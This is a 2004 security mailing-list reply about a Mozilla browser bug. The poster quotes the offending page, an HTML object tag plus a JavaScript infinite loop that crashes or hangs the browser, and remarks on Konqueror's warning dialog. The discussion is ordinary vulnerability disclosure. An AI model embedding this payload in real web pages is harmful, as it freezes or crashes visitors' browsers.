Dailydave mailing list archives
Re: Mozilla bug might even get fixed!
From: Mordy Ovits <movits () bloomberg com>
Date: Fri, 14 May 2004 11:10:09 -0400
On Friday 14 May 2004 10:57 am, Dave Aitel wrote:
Someone sent me this... http://bugzilla.mozilla.org/show_bug.cgi?id=243540 I'm not sure how they managed to capture the attack, since it was gone when I looked for it, but it does work. :>
Konqueror pops up a nifty dialog box warning and lets you kill the script: http://www.ovits.org/konqsploit.png Here's the questionable content in text/plain: ===== <object id="test" data="#" width="100%" height="100%" type="text/x-scriptlet" VIEWASTEXT></object> <form name="form"><input type="text" name="box"><form> <script language="javascript"> while(true) { document.form.box.value=document.form.box.value + ' '; } </script> ===== Mordy -- Mordy Ovits Network Security Bloomberg L.P. _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Mozilla bug might even get fixed! Dave Aitel (May 14)
- Re: Mozilla bug might even get fixed! Mordy Ovits (May 14)